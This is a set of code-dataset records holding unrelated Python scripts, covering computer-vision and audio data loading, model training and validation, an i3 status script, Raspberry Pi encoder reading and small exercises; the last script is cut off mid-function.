\"\"\"\n from pycocotools.coco import COCO\n\n timer = Timer()\n json_file = PathManager.get_local_path(json_file)\n with contextlib.redirect_stdout(io.StringIO()):\n coco_api = COCO(json_file)\n if timer.seconds() > 1:\n logger.info(\"Loading {} takes {:.2f} seconds.\".format(json_file, timer.seconds()))\n\n id_map = None\n action_map = None\n if dataset_name is not None:\n meta = MetadataCatalog.get(dataset_name)\n cat_ids = sorted(coco_api.getCatIds())\n cats = coco_api.loadCats(cat_ids)\n # The categories in a custom json file may not be sorted.\n thing_classes = [c[\"name\"] for c in sorted(cats, key=lambda x: x[\"id\"])]\n meta.thing_classes = thing_classes\n\n # In COCO, certain category ids are artificially removed,\n # and by convention they are always ignored.\n # We deal with COCO's id issue and translate\n # the category ids to contiguous ids in [0, 80).\n\n # It works by looking at the \"categories\" field in the json, therefore\n # if users' own json also have incontiguous ids, we'll\n # apply this mapping as well but print a warning.\n if not (min(cat_ids) == 1 and max(cat_ids) == len(cat_ids)):\n if \"coco\" not in dataset_name:\n logger.warning(\n \"\"\"\nCategory ids in annotations are not in [1, #categories]! 
We'll apply a mapping for you.\n\"\"\"\n )\n id_map = {v: i for i, v in enumerate(cat_ids)}\n meta.thing_dataset_id_to_contiguous_id = id_map\n\n person_cls_id = meta.person_cls_id\n action_classes = meta.action_classes\n\n # sort indices for reproducible results\n img_ids = sorted(coco_api.imgs.keys())\n # imgs is a list of dicts, each looks something like:\n # {'license': 4,\n # 'url': 'http://farm6.staticflickr.com/5454/9413846304_881d5e5c3b_z.jpg',\n # 'file_name': 'COCO_val2014_000000001268.jpg',\n # 'height': 427,\n # 'width': 640,\n # 'date_captured': '2013-11-17 05:57:24',\n # 'id': 1268}\n imgs = coco_api.loadImgs(img_ids)\n # anns is a list[list[dict]], where each dict is an annotation\n # record for an object. The inner list enumerates the objects in an image\n # and the outer list enumerates over images. Example of anns[0]:\n # [{'segmentation': [[192.81,\n # 247.09,\n # ...\n # 219.03,\n # 249.06]],\n # 'area': 1035.749,\n # 'iscrowd': 0,\n # 'image_id': 1268,\n # 'bbox': [192.81, 224.8, 74.73, 33.43],\n # 'category_id': 16,\n # 'id': 42986,\n # 'hoi_isactive': 1,\n # 'hoi_triplets': [{person_id: 42984, object_id: 42986, action_id: 4}, ...],\n # },\n # ...]\n anns = [coco_api.imgToAnns[img_id] for img_id in img_ids]\n\n imgs_anns = list(zip(imgs, anns))\n\n logger.info(\"Loaded {} images in HOI format from {}\".format(len(imgs_anns), json_file))\n\n dataset_dicts = []\n\n ann_keys = [\"iscrowd\", \"bbox\", \"category_id\"]\n \n ann_keys += (extra_annotation_keys or [])\n\n num_instances_without_hoi_annotations = 0\n\n for (img_dict, anno_dict_list) in imgs_anns:\n record = {}\n record[\"file_name\"] = os.path.join(image_root, img_dict[\"file_name\"])\n record[\"height\"] = img_dict[\"height\"]\n record[\"width\"] = img_dict[\"width\"]\n image_id = record[\"image_id\"] = img_dict[\"id\"]\n\n objs = []\n num_instances = len(anno_dict_list)\n for anno in anno_dict_list:\n # Check that the image_id in this annotation is the same as\n # the image_id we're looking at.\n # This fails only when the data parsing logic or the annotation file is buggy.\n\n # The original COCO valminusminival2014 & minival2014 annotation files\n # actually contains bugs that, together with certain ways of using COCO API,\n # can trigger this assertion.\n assert anno[\"image_id\"] == image_id\n\n obj = {key: anno[key] for key in ann_keys if key in anno}\n\n # \"hoi_triplets\" in the annotation is a list[dict], where each dict is an\n # annotation record for an interaction. Example of anno[\"hoi_triplet\"][0]:\n # [{\n # person_id: 42984,\n # object_id: 42986,\n # action_id: 4\n # },\n # ... ]\n # Here \"person_id\" (\"object_id\") is the *anno id* of the person (object) instance.\n # For each instance, we record its interactions with other instances in the given\n # image in an binary matrix named `actions` with shape (N, K), where N is the number\n # of instances and K is the number of actions. 
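As a toy illustration of the (N, K) binary `actions` matrix this comment describes (shapes and indices invented, not taken from the dataset):

import numpy as np

num_instances, num_actions = 3, 5  # N instances, K action classes
actions = np.zeros((num_instances, num_actions))
actions[1, 2] = 1  # instance 1 is the target of action 2, i.e. actions[target_id, action_id] = 1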
If this instance is interacting with\n # j-th instance with k-th action, then (i, j) entry of `actions` will be 1.\n actions = np.zeros((num_instances, len(action_classes)))\n hoi_triplets = anno[\"hoi_triplets\"]\n if len(hoi_triplets) > 0:\n # Mapping *anno id* of instances to contiguous indices in this image\n map_to_contiguous_id_within_image(hoi_triplets, anno_dict_list)\n for triplet in hoi_triplets:\n action_id = triplet[\"action_id\"]\n is_person = (anno[\"category_id\"] == person_cls_id)\n target_id = triplet[\"object_id\"] if is_person else triplet[\"person_id\"]\n actions[target_id, action_id] = 1\n else:\n num_instances_without_hoi_annotations += 1\n\n obj[\"actions\"] = actions\n obj[\"isactive\"] = 1 if len(hoi_triplets) > 0 else 0\n\n obj[\"bbox_mode\"] = BoxMode.XYWH_ABS\n\n if id_map:\n obj[\"category_id\"] = id_map[obj[\"category_id\"]]\n \n objs.append(obj)\n\n record[\"annotations\"] = objs\n dataset_dicts.append(record)\n\n if num_instances_without_hoi_annotations > 0:\n logger.warning(\n \"There are {} instances without hoi annotation.\".format(\n num_instances_without_hoi_annotations\n )\n )\n return dataset_dicts\n\n\ndef map_to_contiguous_id_within_image(hoi_triplets, anno_dict_list):\n \"\"\"\n Map annotation id in HOI triplets to contiguous index within the given image.\n For example, map {\"person_id\": 2001, \"object_id\": 2003, \"action_id\": 1} to\n {\"person_id\": 0, \"object_id\": 2, \"action_id\": 1}) if\n the annotation ids in this image start from 2001.\n\n Args:\n hoi_triplets (list[dict]): HOI annotations of an instance.\n anno_dict_list (list[dict]): annotations of all instances in the image.\n\n Returns:\n list[dict]: HOI annotations with contiguous id within the image.\n \"\"\"\n anno_id_to_contiguous_id = {ann['id']: ix for ix, ann in enumerate(anno_dict_list)}\n # This fails when annotation file is buggy. The dataset may contain person alone interactions,\n # (e.g., without interacting objects). The object index in this case is denoted as -1.\n anno_id_to_contiguous_id.update({-1: -1})\n\n for triplet in hoi_triplets:\n triplet['person_id'] = anno_id_to_contiguous_id[triplet['person_id']]\n triplet['object_id'] = anno_id_to_contiguous_id[triplet['object_id']]\n","sub_path":"lib/data/datasets/vcoco.py","file_name":"vcoco.py","file_ext":"py","file_size_in_byte":9012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"37550706","text":"#!/usr/bin/env python2\n\nimport sys\nimport json\nimport subprocess\n\nGREEN = \"#00FF00\"\nRED = \"#FF0000\"\nYELLOW = \"#FFFF00\"\n\ndef print_line(message):\n \"\"\" Non-buffered printing to stdout. \"\"\"\n sys.stdout.write(message + '\\n')\n sys.stdout.flush()\n\ndef read_line():\n \"\"\" Interrupted respecting reader for stdin. 
\"\"\"\n # try reading a line, removing any extra whitespace\n try:\n line = sys.stdin.readline().strip()\n # i3status sends EOF, or an empty line\n if not line:\n sys.exit(3)\n return line\n # exit on ctrl-c\n except KeyboardInterrupt:\n sys.exit()\n\ndef get_memory():\n total = 0\n available = 0\n with open(\"/proc/meminfo\") as m:\n for line in m:\n k,v = line.split(\":\")\n k,v = k.strip(), int(v.strip().split(\" \")[0])/1024.0/1024.0\n if k.startswith(\"MemTotal\"):\n total = v\n elif k.startswith(\"MemAvailable\"):\n available = v\n\n col = GREEN\n if (available < 0.2 * total):\n col = YELLOW\n if (available < 0.1 * total):\n col = RED\n return col, \"{:.1f}g / {:.1f}g\".format(available, total)\n\nif __name__ == '__main__':\n # Skip the first line which contains the version header.\n print_line(read_line())\n\n # The second line contains the start of the infinite array.\n print_line(read_line())\n\n while True:\n line, prefix = read_line(), ''\n # ignore comma at start of lines\n if line.startswith(','):\n line, prefix = line[1:], ','\n\n j = json.loads(line)\n # insert information into the start of the json, but could be anywhere\n # CHANGE THIS LINE TO INSERT SOMETHING ELSE\n\n mem_color, mem = get_memory()\n\n j.insert(0, {'full_text' : '%s' % mem, 'name' : 'mem', 'color' : mem_color})\n\n # and echo back new encoded json\n print_line(prefix+json.dumps(j))\n\n","sub_path":"home/.i3/mystatus.py","file_name":"mystatus.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"359258789","text":"#!/usr/bin/env python3\n# Copyright (c) 2008-11 Qtrac Ltd. All rights reserved.\n# This program or module is free software: you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as published\n# by the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version. It is provided for educational\n# purposes and is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU\n# General Public License for more details.\n\nimport sys\nimport unicodedata\n\n\ndef print_unicode_table(wordList):\n print(\"decimal hex chr {0:^40}\".format(\"name\"))\n print(\"------- ----- --- {0:-<40}\".format(\"\"))\n\n code = ord(\" \")\n end = min(0xD800, sys.maxunicode) # Stop at surrogate pairs\n\n while code < end:\n c = chr(code)\n name = unicodedata.name(c, \"*** unknown ***\")\n # match all occurences\n if word is None: \n print(\"{0:7} {0:5X} {0:^3c} {1}\".format(code, name.title()))\n else:\n all_match = True\n for wd in wordList:\n if wd not in name.lower():\n all_match = False\n break\n if (all_match):\n print(\"{0:7} {0:5X} {0:^3c} {1}\".format(code, name.title())) \n code += 1\n\n\nword = None\nwordList = []\nnumArg = len(sys.argv)\nhelp = False\nif numArg > 1:\n if sys.argv[1] in (\"-h\", \"--help\"):\n print(\"usage: {0} [string] [string] ...\".format(sys.argv[0]))\n help = True\n else:\n for k in range(1, numArg):\n word = sys.argv[k].lower()\n wordList.append(word)\n\nif help == False:\n print_unicode_table(wordList)\n","sub_path":"Mypy/p31ex/print_unicode_mod.py","file_name":"print_unicode_mod.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"369453328","text":"# Lab 1 - Guess the Number Game, Version 1\n# Version 1 is also the full version.\n# It read's the users guess\n# It displays the value selected by the program, and then the user's guess\n\n\nimport random\n\ndef main():\n # display instructions\n print('I am thinking of a number between 1 and 10.')\n program_selection = random.randint(1,10) # randomly pick an integer between 1 and 10\n \n user_guess = input('What is the number?') # get player guess\n print('The number was ' + str(program_selection) + '.')\n print('You guessed ' + str(user_guess) + '.')\n \nmain()","sub_path":"guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"501275064","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle as sh\nfrom sklearn.metrics import confusion_matrix\nfrom utils import to_categorical\nfrom metrics import get_roc_curve\nfrom models import FactoryModel\nimport numpy as np\n\nclass ValidationFactory:\n def __init__(self, name, trainner, x, state=None):\n self.validator = None\n if name == 'kfold':\n self.validator = KFoldCustom(k=x, trainner=trainner, state=state)\n elif name == 'holdout':\n self.validator = Holdout(test_size=x, trainner=trainner, state=state)\n \nclass Holdout:\n def __init__(self, test_size, trainner, state=None):\n self.trainner = trainner\n self.test_size = test_size\n self.state = state.get_state_validation(valid_name='holdout', h=test_size*100)\n\n def add_score(self, metrics, dict_scores, scores):\n for i, metric in enumerate(metrics):\n dict_scores[metric] = []\n dict_scores[metric].append(scores[i])\n\n def execute(self, inputs, targets, config_model=None, dataset_name=''):\n model = FactoryModel(\n config_model['name'],\n '{}_{}_holdout-{}'.format(dataset_name, config_model['name'], self.test_size),\n config_model['size'],\n config_model['params'],\n config_model['init']).get_model()\n\n if self.state.epochs > 0:\n model().load_weights(self.state.weights)\n else:\n #initialize weight and history path for the model\n self.state.weights += model().name + '.h5'\n self.state.history += 
'{}/history_{}.csv'.format(config_model['name'], model().name)\n\n dict_scores = {}\n dict_scores['scores'] = {}\n dict_scores['scores']['model'] = [model().name]\n\n print('\\n------[executing Hold out {} for {} model]------------------'.format(self.test_size*100, model().name))\n train_x, test_x, train_y, test_y = train_test_split(inputs,\n targets, \n test_size=self.test_size,\n random_state=0, \n shuffle=False)\n history = self.trainner.train_model(train_x,\n to_categorical(train_y),\n model(),\n validation_data=(test_x,to_categorical(test_y)),\n init_epoch=self.state.epochs\n )\n\n print('Avaluating model-------------------------------------------------------------')\n scores = model().evaluate(test_x, to_categorical(test_y))\n\n self.add_score(model().metrics_names, dict_scores['scores'], scores)\n\n\n (fpr, tpr, auc) = get_roc_curve(to_categorical(test_y), model().predict(test_x))\n dict_scores['roc'] = (fpr, tpr, auc)\n dict_scores['history'] = [history]\n dict_scores['cm'] = confusion_matrix(test_y, np.argmax(model().predict(test_x), axis=1))\n\n print(\"Result for the {} model\".format(model().name))\n print(dict_scores['scores'])\n\n self.state.status = True\n \n return dict_scores\n\nclass KFoldCustom:\n def __init__(self, k, trainner=None, state=None):\n self.k = k\n self.trainner = trainner\n self.state = state.get_state_validation(valid_name='kfold', k=k) if trainner != None else None\n self.state_i = self.state.current_k if state != None else 1\n \n def split(self, X):\n n = X.shape[0]\n dataset = np.arange(0, n, dtype=int)\n while self.state_i <= self.k:\n idx = np.arange(n * (self.state_i - 1) / self.k, n * self.state_i / self.k, dtype=int)\n yield np.array(list(set(dataset) - set(idx))), idx\n self.state_i += 1\n\n def execute(self, inputs, targets, config_model=None, dataset_name=''):\n \n print('\\n------[executing {}-fold for {} model]------------------'.format(self.k, config_model['name']))\n scores_dict = {}\n scores_dict['scores'] = {}\n scores_dict['scores']['model'] = [config_model['name']]\n fprs = []\n tprs = []\n aucs = []\n scores = []\n cms = []\n\n #training\n n_fold = self.state_i\n for train, test in self.split(inputs):\n print('\\n{}-fold'.format(n_fold))\n model = FactoryModel(\n config_model['name'],\n '{}_{}_kfold-{}_{}'.format(dataset_name, config_model['name'], self.k, n_fold),\n config_model['size'],\n config_model['params']).get_model()\n \n \n if self.state.get_epochs(self.state_i - 1) > 0:\n model().load_weights(self.state.get_weights(self.state_i - 1))\n else:\n #initialize weight and history path for the model i\n self.state.weights[self.state_i - 1] += model().name + '.h5'\n self.state.historys[self.state_i - 1] += '{}/history_{}.csv'.format(config_model['name'], model().name)\n\n\n self.trainner.train_model(inputs[train],\n to_categorical(targets[train]), \n model(),\n validation_data=(inputs[test], to_categorical(targets[test])),\n init_epoch=self.state.get_epochs(self.state_i - 1),\n )\n n_fold += 1\n self.state.current_k = n_fold\n\n self.state_i = 1\n n_fold = self.state_i\n for train, test in self.split(inputs):\n print('\\nAvaluating {}-fold model\\n'.format(n_fold))\n model = FactoryModel(\n config_model['name'],\n config_model['name']+ '_k{}'.format(n_fold),\n config_model['size'],\n config_model['params']).get_model()\n\n model().load_weights(self.state.get_weights(self.state_i-1))\n\n scores_model = model().evaluate(inputs[test], to_categorical(targets[test]))\n\n #roc curve and auc\n (fpr, tpr, auc) = 
get_roc_curve(to_categorical(targets[test]), model().predict(inputs[test]))\n\n            # get confusion matrix\n            cms.append(\n                confusion_matrix(\n                    targets[test], \n                    np.argmax(model().predict(inputs[test]), axis=1)\n                )\n            )\n\n            fprs.append(fpr)\n            tprs.append(tpr)\n            aucs.append(auc)\n            \n            # historys.append(history)\n            scores.append(scores_model)\n            n_fold += 1\n\n        scores = np.array(scores)\n        for i, m in enumerate(model().metrics_names):\n            scores_dict['scores'][m] = [scores[:,i].mean()]\n\n        roc_max = (fprs[0], tprs[0], aucs[0])\n\n        for i in range(len(aucs)):\n            if roc_max[2] > aucs[i]:\n                roc_max = (fprs[i], tprs[i], aucs[i])\n\n        #mean confusion matrix\n        cm_mean = np.zeros(cms[0].shape)\n        for cm in cms:\n            cm_mean += (cm/cms[0].shape[0]).astype('int32')\n\n        cm_mean = cm_mean.astype('int32')\n        \n        scores_dict['roc'] = roc_max\n        # scores_dict['history'] = historys\n        scores_dict['cm'] = cm_mean\n        \n        print(\"Result for the {} model\".format(model().name))\n        print(scores_dict['scores'])\n\n        self.state.status = True\n\n        return scores_dict\n\nif __name__ == '__main__':\n    kfold = KFoldCustom(3, None)\n\n    for train, test in kfold.split(np.array([1,2,3,4,5,6])):\n        print(train, test)\n\n","sub_path":"src/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"458373563","text":"\"\"\"\nPurpose\n=======\n   Check that Confluent-Kafka version on its respective Nodes are as User Specified\n\nTest Steps\n==========\n    1. Go to shell\n    2. Execute \"rpm -qa | grep -i \"componentName\" | grep \"version\"\" and check that Confluent-Kafka version on all Confluent-Kafka machines are as User Specified\n\"\"\"\nfrom potluck.nodes import connect, get_nodes_by_type\nfrom potluck.logging import logger\nfrom potluck.reporting import report\nfrom potluck.parsing import parser\nobj_parser = parser()\nversiondict ={}\n\n### Creating A dictionary with Structure [Component]:[Version] ###\nversiondict = obj_parser.create_dict_version(\"userinput/version_info_old.txt\")\nversion=versiondict[\"CONFLUENT-KAFKA\"]\n\nconfluent_kafkanodes = get_nodes_by_type(\"CONFLUENT-KAFKA\")\n\nif (not confluent_kafkanodes):\n    report.fail(\"No Confluent-Kafka nodes in the testbed \")\n\nfor node_alias in confluent_kafkanodes:\n    logger.info(\"Checking that Confluent-Kafka version on all Confluent-Kafka machines are as User Specified\")\n    node = connect(node_alias)\n    flag = node.grepVersion(\"Confluent-Kafka\",version)\n    if flag ==1:\n        logger.info(\"Confluent-Kafka version on all Confluent-Kafka nodes are as User Specified\")\n    else:\n        report.fail(\"Confluent-Kafka version on all Confluent-Kafka machines are not as User Specified\")\n\n","sub_path":"ciTool/Potluck_cloudera/Testcases/solution/Platform/verify_confluent_kafka_version.py","file_name":"verify_confluent_kafka_version.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"64750001","text":"def dfs(sum, num, arr, start, n):\n    if num==0:\n        if sum==n:\n            return True\n        else:\n            return False\n    for i in range(start,10):\n        arr.append(i)\n        if dfs(sum+i, num-1, arr, i+1, n):\n            return True\n        else:\n            arr.remove(i)\n    \n\nif __name__=='__main__':\n    container=eval(input())\n    n=container[1]\n    k=container[0]\n    arr=[]\n    result=[]\n    for i in range(1, 9):\n        if dfs(0, k, arr, i, n):\n            result.append(arr.copy())\n        arr.clear()\n    
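The DFS above enumerates ascending digit combinations of 1..9 that sum to n; an equivalent formulation with the standard library (helper name invented) would be:

from itertools import combinations

def combination_sum(k, n):
    # All k-subsets of the digits 1..9 whose sum is n.
    return [list(c) for c in combinations(range(1, 10), k) if sum(c) == n]

print(combination_sum(3, 9))  # [[1, 2, 6], [1, 3, 5], [2, 3, 4]]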
print(result)\n\n\n","sub_path":"Code/CodeRecords/2739/60617/256784.py","file_name":"256784.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"414447016","text":"import nengo\n\nimport nengo_pushbot\nimport numpy as np\n\nmodel = nengo.Network()\nwith model:\n #input = nengo.Node(lambda t: [0.5*np.sin(10*t), 0.5*np.cos(10*t)])\n\n input = nengo.Node([0.5, -0.5])\n a = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n b = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n c = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n d = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n\n #nengo.Connection(a, b, filter=0.01)\n #nengo.Connection(b, c, filter=0.01)\n #nengo.Connection(c, d, filter=0.01)\n\n #nengo.Connection(a, a, transform=[[1.1, 0], [0, 1.1]], filter=0.1)\n #b = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n\n bot = nengo_pushbot.PushBot(address=(0xFE, 0xFF, 1, 0, 0))\n\n tracks = nengo_pushbot.Tracks(bot)\n #def printout(t, x):\n # print t, x\n # return []\n #tracks2 = nengo.Node(printout, size_in=2)\n\n nengo.Connection(input, a, filter=0.01)\n nengo.Connection(a, b, filter=0.01)\n nengo.Connection(b, c, filter=0.01)\n nengo.Connection(c, d, filter=0.01)\n nengo.Connection(d, tracks, filter=0.01)\n #nengo.Connection(b, tracks2, filter=0.01)\n\n#sim_normal = nengo.Simulator(model)\n#sim_normal.run(5)\n\nimport nengo_spinnaker\nsim = nengo_spinnaker.Simulator(model)\nsim.run(10)\n\n","sub_path":"examples/test_spinn_tracks2.py","file_name":"test_spinn_tracks2.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212178842","text":"import pandas as pd\nimport numpy as np\nimport librosa \nimport csv\nimport random\nimport sys\nimport time\n\n# Extraction of the 50 most used labels and paths\n\ndf_sounds=pd.read_csv(\"raw_magnatagatune_data/annotations_final.csv\", header=None, sep='\\t')\n\ndataset_sound= df_sounds.values\n\nLabels = dataset_sound[1:len(dataset_sound),1:51].astype(float) # We dont want header / we convert to float to be able to use it later.\nPath = dataset_sound[1:len(dataset_sound),189:190].astype(str) # We dont want the header / Here we need to keep the paths as strings as it is the requiered format.\n\n\nk = 0\nfor i in range(1,len(dataset_sound[0])-1): # =189 (We neither want to look at the id column nor at the path column)\n\tsom = 0\n\tfor s in range(1, len(dataset_sound)): # We dont care about the header\n\t\tsom += int(dataset_sound[s, i]) \n\tif (som > 475):\n\t\tfor j in range(1,len(dataset_sound)):\n\t\t\tLabels[j-1,k] = dataset_sound[j,i]\n\t\tk = k + 1\n\nnp.savetxt('databases/labels_Mtatune.csv', Labels, delimiter=',')\n\nfor j in range(1,len(dataset_sound)): # No header\n\tPath[j-1] = dataset_sound[j,len(dataset_sound[0])-1] # We load the last column, which corresponds to the path.\n\n\n\n\nTaille_sousB = len(Path)\n\nwith open(\"databases/dbwhole.csv\", \"wb\") as db:\n\twriter = csv.writer(db)\n\tfor i in range(Taille_sousB): # taillesousb\n\t\ttry:\n\t\t\tX, sample_rate = librosa.load(\"raw_magnatagatune_data/\"+Path[i][0], res_type='kaiser_fast', sr = 16000)#, sr = 16000) # Probably an error due to try : if someting fails X stays empty at the line of the failed event. 
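A minimal sketch of the defensive loading idiom used in this loop — skip unreadable clips instead of aborting. The helper is hypothetical and assumes the same librosa keyword arguments as the script:

import librosa

def load_clip(path, sr=16000):
    # Returns None for unreadable files so the caller can log and continue.
    try:
        y, _ = librosa.load(path, sr=sr, res_type='kaiser_fast')
        return y
    except Exception:
        return None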
\n\t\t\tX[len(X) - 1] = i\n\t\t\twriter.writerow(X)\n\t\texcept:\n\t\t\tprint("unexpected error line" + str(i))\n","sub_path":"Create_Magnatagatune_dataset.py","file_name":"Create_Magnatagatune_dataset.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"411031334","text":"import RPi.GPIO as io\nimport time\nimport datetime\nimport math\n\nio.setmode(io.BOARD)\n\n# sensor 1\nen1_pin = 35\nio.setup(en1_pin, io.IN, pull_up_down=io.PUD_UP)\n\n# sensor 2\nen2_pin = 33\nio.setup(en2_pin, io.IN, pull_up_down=io.PUD_UP)\n\n# encoder 1\nencoder1_sensors = [en1_pin, en2_pin]\nA1_old = 0\nencoder1_count = 0\n\ndef encoder1Callback(channel):\n\t# this function is called when an encoder reading is detected\n\tglobal A1_old, encoder1_count\n\tif io.input(channel):\n\t\tA = 1\n\telse:\n\t\tA = 0\n\tif io.input(encoder1_sensors[1]):\n\t\tB = 1\n\telse:\n\t\tB = 0\n\tif A != A1_old:\n\t\tif A != B:\n\t\t\tencoder1_count += 1\n\t\telse:\n\t\t\tencoder1_count -= 1\n\tA1_old = A\n\t\ndef initializeEncoders():\n\tglobal encoder1_count\n\tencoder1_count = 0;\n\t\ndef countstorad(count):\n\t# returns the joint-space angle in radians\n\trad = 2*math.pi*count/8/48\n\treturn rad\t\n\nio.add_event_detect(en1_pin, io.BOTH, callback=encoder1Callback)\nwhile True:\n\tprint(countstorad(encoder1_count))\n\tenter = raw_input(\"Press  to continue: \")","sub_path":"encoder_test.py","file_name":"encoder_test.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"597615021","text":"import tensorflow as tf\nimport tensorlayer as tl\nimport numpy as np\nfrom PIL import Image\nimport io\nimport os\nimport sys \nimport time\nfrom scipy.misc import imread, imresize\nfrom load_data import *\n\n#Read data\npath = \"data/train\" \nfilename_train = \"train.tfrecords\"\nfilename_val = \"validation.tfrecords\"\n\nnum_of_train, num_of_val = image_folder_to_tfrecord(path, filename_train, filename_val)\n\nimg_train, label_train = read_and_decode(filename_train, is_train=True)\nimg_val, label_val = read_and_decode(filename_val, is_train=False)\n\nbatch_size = 100\nimg_batch_train, label_batch_train = tf.train.shuffle_batch([img_train, label_train],\n                                                batch_size=batch_size,\n                                                capacity=2000,\n                                                min_after_dequeue=1000,\n                                                num_threads=16\n                                                )\n\nimg_batch_val, label_batch_val = tf.train.shuffle_batch([img_val, label_val],\n                                                batch_size=(batch_size/6),\n                                                capacity=2000,\n                                                min_after_dequeue=1000,\n                                                num_threads=16\n                                                )\n\n#Input and placeholder\nx = tf.placeholder(tf.float32, [None, 224, 224, 3])\ny_ = tf.placeholder(tf.int32, shape=[None, ], name='y_')\ncost_train, acc_train = inference(x, y_, reuse=None, is_train=True,)\ncost_val, acc_val = inference(x, y_, reuse=True, is_train=False)\n\nsess = tf.InteractiveSession()\n#Load VGG16\nnpz = np.load('vgg16_weights.npz')\n\nparams = []\nfor val in sorted( npz.items() ):\n    print(\"  Loading %s\" % str(val[1].shape))\n    params.append(val[1])\n\n#tl.files.assign_params(sess, params[:-3], network_train)\n\n#Optimizer\nn_epoch = 60\nlearning_rate = 0.0001\nprint_freq = 1\nn_step_epoch = int(num_of_train/batch_size)\nn_step = n_epoch * n_step_epoch\n\nwith tf.device('/gpu:0'):\n    #Will be changed\n    optimizer = tf.train.AdamOptimizer(learning_rate, \n                                    beta1=0.9, \n                                    beta2=0.999,\n                                    epsilon=1e-08, \n                                    use_locking=False)\n    train_op = optimizer.minimize(cost_train,\n                                  
var_list=train_params)\n\n sess.run(tf.initialize_all_variables())\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n step = 0\n\n for epoch in range(n_epoch):\n start_time = time.time()\n train_loss, train_acc, n_batch = 0, 0, 0\n for s in range(n_step_epoch):\n data_train, label_train = sess.run([img_batch_train, label_batch_train])\n err, ac, _ = sess.run([cost_train, acc_train, train_op], feed_dict={x: data_train, y_: label_train})\n step += 1\n train_loss += err; train_acc += ac; n_batch += 1\n\n if epoch + 1 == 1 or (epoch + 1) % print_freq == 0:\n print(\"Epoch %d : Step %d-%d of %d took %fs\" % (epoch, step, step + n_step_epoch, n_step, time.time() - start_time))\n print(\" train loss: %f\" % (train_loss/ n_batch))\n print(\" train acc: %f\" % (train_acc/ n_batch))\n \n val_loss, val_acc, n_batch = 0, 0, 0\n for _ in range(int(num_of_val/int(batch_size/6))):\n data_val, label_val = sess.run([img_batch_val, label_batch_val])\n err, ac = sess.run([cost_val, acc_val], feed_dict={x:data_val, y_:label_val})\n val_loss += err; val_acc += ac; n_batch += 1\n print(\" val loss: %f\" % (val_loss/ n_batch))\n print(\" val acc: %f\" % (val_acc/ n_batch))\n\n coord.request_stop()\n coord.join(threads)\n\nprint(\"Save model \" + \"!\"*10)\nsaver = tf.train.Saver()\nsave_path = saver.save(sess, \"model.ckpt\")\nsess.close()","sub_path":"Fishirie/vgg_basic.py","file_name":"vgg_basic.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"7991018","text":"import numpy as np\nimport keras\nfrom keras.datasets import mnist\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.regularizers import l2\nfrom keras import backend as K\n\ndata_path = \"/home/unagpal/mnist/\"\ntrain_data = np.loadtxt(data_path + \"mnist_train.csv\", \n delimiter=\",\")\ntest_data = np.loadtxt(data_path + \"mnist_test.csv\", \n delimiter=\",\") \ny_train_All = train_data[:,0]\ny_test = test_data[:,0]\nX_train_All = train_data[:,1:].reshape((60000,28,28))\nX_test = test_data[:,1:].reshape((10000,28,28)) \n#(X_train_All, y_train_All), (X_test, y_test) = mnist.load_data()\ntrain_ind = np.concatenate((np.argwhere(y_train_All==1), np.argwhere(y_train_All==7))).flatten()\ntest_ind = np.concatenate((np.argwhere(y_test==1), np.argwhere(y_test==7))).flatten()\ny_test = y_test[test_ind]\ny_test[y_test==7] = 0\ny_test_original = y_test\ny_test = keras.utils.to_categorical(y_test, num_classes=2)\nX_test = np.expand_dims(X_test[test_ind], axis=1)\nfolder_path = \"/home/unagpal/mnist/\"\n\n#AL Parameters\n#train_size_init = 6\ndropout_prob = 0.25\nnum_experiments = 3\nnum_acquisitions = 400 \n\n#Keras Model Parameters\nnum_classes = 2\nnb_filters = 30\nnb_pool = 3\nnb_conv = 4\nimg_rows = img_cols = 28\n\n#Used for calculating test acc (average of MC dropout predictions)\ndef predict_with_uncertainty(f, x, n_iter=100):\n result = np.zeros((n_iter,x.shape[0], 2))\n for i in range(n_iter):\n predictions = np.array(f((x, 1))[0])\n result[i,:, :] = predictions\n prediction = result.mean(axis=0)\n return prediction\n\ndef run_model (train_data_indices):\n X_train = np.expand_dims(X_train_All[train_data_indices], axis=1)\n y_train = y_train_All[train_data_indices]\n y_train[y_train==7] = 0\n y_train = 
